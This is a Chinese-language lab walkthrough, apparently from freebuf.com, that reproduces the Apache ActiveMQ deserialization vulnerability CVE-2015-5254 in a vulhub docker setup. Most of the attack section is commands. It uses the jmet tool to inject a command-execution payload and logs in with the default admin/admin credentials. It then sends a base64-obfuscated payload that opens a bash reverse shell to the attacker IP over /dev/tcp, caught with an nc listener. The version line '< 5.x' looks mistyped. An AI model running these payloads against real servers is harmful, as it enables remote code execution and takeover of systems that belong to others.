ACTIVEMQ反序列化漏洞（CVE-2015-5254） – 作者:bjn123

• 影响版本 : Apache ActiveMQ < 5.x
• 条件
  • :必须要登录查看队列—-需要知道用户名密码或者弱口令
  • 必须去点击攻击者插入的信息才能触
• 复现环境:
  • 攻击者ip:192.168.17.129
  • 受害者ip:192.168.17.133
  • 搭建环境用docker

1. 启动环境
   1. 启动docker服务 service docker start
   2. 进入环境../vulhub/activemq/CVE-2015-5254
   3. 启动环境service-composem up -d
2. docker ps 查看开放了那些端口,或者也可用扫描工具扫描也可(我承认我懒了)
3. 
   我直接访问的是192.168.17.133:8161

• 漏洞复现
  • 复线工具现在地址https://github.com/matthiaskaiser/jmet/releases

4. 用工具直接命令行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y “touch /tmp/success” -Yp ROME 192.168.17.133 61616
   
5. 去web访问192.168.17.133:8161
   输入用户名和密码 admin/admin
   可查看攻击者创建的队列消息
   
6. 点击该队列触发命令并执行在/tmp创建success文件
7. 在受害者主机进入docker容器到/tmp目录下便会看到success文件

• 反弹shell
  1. 同样的原理用漏洞工具在cmd输入java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjEyOS8xOTExMSAwPiYx=}|{base64,-d}|{bash,-i}” -Yp ROME 192.168.17.133 61616
     
  2. 其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjEyOS8xOTExMSAwPiYx=经过base64编码,解码为bash -i >& /dev/tcp/192.168.17.129/19111 0>&1
  3. 用 nc 监听端口 19111
     
  4. 进入web界面点击消息队列,便可返弹shell
     

来源：freebuf.com 2021-03-30 15:42:14 by: bjn123